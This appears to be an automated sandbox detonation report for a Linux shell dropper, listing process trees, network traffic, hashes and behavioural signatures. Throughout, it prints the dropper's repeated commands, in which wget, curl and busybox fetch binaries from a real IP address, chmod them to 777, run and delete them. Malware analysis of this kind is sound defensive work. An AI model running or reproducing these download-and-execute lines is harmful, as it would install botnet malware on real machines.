[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:28

Reported

2024-10-21 01:30

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

17s

Max time network

129s

Command Line

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A

Processes

/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

